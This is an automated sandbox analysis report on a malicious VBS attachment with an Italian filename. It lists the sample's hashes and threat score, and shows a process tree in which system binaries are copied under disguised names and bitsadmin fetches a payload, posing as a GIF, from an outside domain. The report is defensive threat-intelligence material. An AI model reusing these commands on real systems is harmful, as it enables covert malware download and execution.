Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows10_x64 -
resource
win10 -
submitted
14-09-2020 12:13
General
-
Target
Allegato_doc_BRNLSN65H44H501N.vbs
-
Size
3KB
-
MD5
399426adfd02de2e27ebca41608be96e
-
SHA1
7b7629618e0cf7d4826b6c8c6dceea344233df3b
-
SHA256
a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056
-
SHA512
68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd
Score
8/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe2⤵
-
C:\Users\Admin\AppData\Roaming\nUpPg.exe"C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif2⤵
- Executes dropped EXE